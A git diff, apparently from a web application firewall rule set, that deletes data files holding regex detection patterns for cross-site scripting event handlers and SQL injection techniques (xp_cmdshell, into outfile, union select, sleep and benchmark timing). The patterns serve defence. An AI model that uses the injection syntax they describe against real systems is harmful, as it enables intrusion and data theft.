-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncardstatechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncellchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncfstatechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingtimechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchecking[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclick[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclose[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommand[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommandupdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncomplete[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionupdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnected[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnecting[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontextmenu[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontrolselect[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncopy[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncuechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncut[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataavailable[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatachange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataerror[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetchanged[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetcomplete[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondblclick[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeactivate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliveryerror[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliverysuccess[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicefound[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicelight[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicemotion[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceorientation[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceproximity[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondialing[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisabled[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondischargingtimechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnected[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnecting[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondownloading[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragdrop[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragenter[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragexit[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondraggesture[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragleave[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragover[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondrop[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondurationchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onemptied[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenabled[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onendEvent[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onended[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenter[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerror[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerrorupdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onexit[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfailed[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfilterchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfinish[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocus[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusin[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusout[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onformchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onforminput[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadaxismove[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttondown[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttonup[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadconnected[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepaddisconnected[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onget[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhashchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheadphoneschange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheld[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhelp[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onholding[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onicccardlockerror[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oniccinfochange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onincoming[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninput[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninvalid[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeydown[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeypress[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeyup[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlevelchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadeddata[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadedmetadata[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlosecapture[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)only[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmark[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmessage[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousedown[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseenter[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseleave[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousemove[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseout[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseover[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseup[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousewheel[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmove[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoveend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmovestart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenerror[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkdownload[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkupload[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozorientationchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockerror[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoztimechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnomatch[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnoupdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onobsolete[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoffline[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ononline[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onopen[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflow[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflowchanged[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpagehide[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpageshow[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaint[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaste[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpause[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplay[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplaying[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopstate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphidden[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphiding[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshowing[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshown[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onprogress[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpropertychange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onratechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreadystatechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreceived[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onremovetrack[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeatEvent[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeat[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreset[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresize[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresult[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresume[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresuming[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onretrieving[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowenter[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowexit[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsdelete[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsinserted[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onscroll[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseekcomplete[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeked[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeking[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselect[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselectstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsending[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsent[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onset[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onshow[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstalled[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatuschanged[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstkcommand[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstksessionend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstop[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsubmit[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuccess[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuspend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontext[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeout[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeupdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchcancel[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchenter[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchleave[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchmove[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitioncancel[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionrun[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunderflow[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunload[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupdateready[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupgradeneeded[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onuserproximity[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onussdreceived[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onversionchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvoicechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvolumechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwaiting[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwarning[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwheel[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onzoom[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ping[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)src[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)style[\s\x08]*?= diff --git a/util/regexp-assemble/regexp-942120.data b/util/regexp-assemble/regexp-942120.data deleted file mode 100644 index 83668cc943..0000000000 --- a/util/regexp-assemble/regexp-942120.data +++ /dev/null @@ -1,21 +0,0 @@ -\!\= -\&\& -\|\| ->> -<< ->= -<= -<> -<=> -\bxor\b -\bregexp\b -regexp\s+binary -\bisnull\b -\brlike\b -rlike\s+binary -not\s+between\s+0\s+and -is\s+null -like\s+null -^in[+\s]*\([\s\d\"]+[^()]*\) -\Win[+\s]*\([\s\d\"]+[^()]*\) -<>\s+binary diff --git a/util/regexp-assemble/regexp-942130.data b/util/regexp-assemble/regexp-942130.data deleted file mode 100644 index 432281104b..0000000000 --- a/util/regexp-assemble/regexp-942130.data +++ /dev/null @@ -1,16 +0,0 @@ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?=[\s'\"`()]*?(?:\b\1\b) -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=>[\s'\"`()]*?(?:\b\1\b) -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?like[\s'\"`()]*?(?:\b\1\b) -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?rlike[\s'\"`()]*?(?:\b\1\b) -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?sounds\s+like[\s'\"`()]*?(?:\b\1\b) -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?regexp[\s'\"`()]*?(?:\b\1\b) -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?!=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?\^[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?is\s+not[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+like[\s'\"`()]*?(?!\b\1\b)[\d\w]+ -[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+regexp[\s'\"`()]*?(?!\b\1\b)[\d\w]+ diff --git a/util/regexp-assemble/regexp-942170.data b/util/regexp-assemble/regexp-942170.data deleted file mode 100644 index 18d61e72bd..0000000000 --- a/util/regexp-assemble/regexp-942170.data +++ /dev/null @@ -1,6 +0,0 @@ -select\s+benchmark\s*?\(\s*?[(]?\s*?\w+ -;\s+benchmark\s*?\(\s*?[(]?\s*?\w+ -select\s+if\s*?\(\s*?[(]?\s*?\w+ -;\s+if\s*?\(\s*?[(]?\s*?\w+ -select\s+sleep\s*?\(\s*?[(]?\s*?\w+ -;\s+sleep\s*?\(\s*?[(]?\s*?\w+ diff --git a/util/regexp-assemble/regexp-942180.data b/util/regexp-assemble/regexp-942180.data deleted file mode 100644 index 8ab41df92f..0000000000 --- a/util/regexp-assemble/regexp-942180.data +++ /dev/null @@ -1,21 +0,0 @@ -\d[\"'`]\s+[\"'`]\s+\d -^admin\s*?[\"'`] -(?:/\*)+[\"'`]+\s? -(?:/\*)+[\"'`]+\s?-- -(?:/\*)+[\"'`]+\s?# -(?:/\*)+[\"'`]+\s?/\* -(?:/\*)+[\"'`]+\s?{ -[\"'`]\s*?or[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] -[\"'`]\s*?xor[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] -[\"'`]\s*?div[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] -[\"'`]\s*?like[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] -[\"'`]\s*?between[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] -[\"'`]\s*?and[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] -[\"'`]\s*?[^\w\s]?=\s*?[\"'`] -[\"'`]\W*?[+=]+\W*?[\"'`] -[\"'`]\s*?[!=|][\d\s!=+-]+.*?[\"'`(].*?$ -[\"'`]\s*?[!=|][\d\s!=]+.*?\d+$ -[\"'`]\s*?like\W+[\w\"'`(] -\sis\s*?0\W -where\s[\s\w\.,-]+\s= -[\"'`][<>~]+[\"'`] diff --git a/util/regexp-assemble/regexp-942190.data b/util/regexp-assemble/regexp-942190.data deleted file mode 100644 index 3745cb1106..0000000000 --- a/util/regexp-assemble/regexp-942190.data +++ /dev/null @@ -1,20 +0,0 @@ -[\"'`]\s*?!\s*?[\"'`\w] -[\"'`];?\s*?having\b\s*?[^\s] -[\"'`];?\s*?select\b\s*?[^\s] -[\"'`];?\s*?union\b\s*?[^\s] -\s*?exec.*?\Wxp_cmdshell -\s*?execute.*?\Wxp_cmdshell -\wiif\s*?\( -connection_id\s*?\([^\)]*? -current_user\s*?\([^\)]*? -database\s*?\([^\)]*? -exec\s+master\. -execute\s+master\. -from\W+information_schema\W -into[\s+]+dumpfile\s*?[\"'`] -into[\s+]+outfile\s*?[\"'`] -schema\s*?\([^\)]*? -select.*?\w?user\( -union select @ -union[\w(\s]*?select -user\s*?\([^\)]*? diff --git a/util/regexp-assemble/regexp-942200.data b/util/regexp-assemble/regexp-942200.data deleted file mode 100644 index 44eff5141d..0000000000 --- a/util/regexp-assemble/regexp-942200.data +++ /dev/null @@ -1,14 +0,0 @@ -,.*?[)\da-f\"'`][\"'`][\"'`].*?[\"'`] -,.*?[)\da-f\"'`][\"'`](?:\r?\n)?\z -,.*?[)\da-f\"'`][\"'`][^\"'`]+ -\Wselect.+\W*?from -select\s*?\(\s*?space\s*?\( -create\s*?\(\s*?space\s*?\( -rename\s*?\(\s*?space\s*?\( -truncate\s*?\(\s*?space\s*?\( 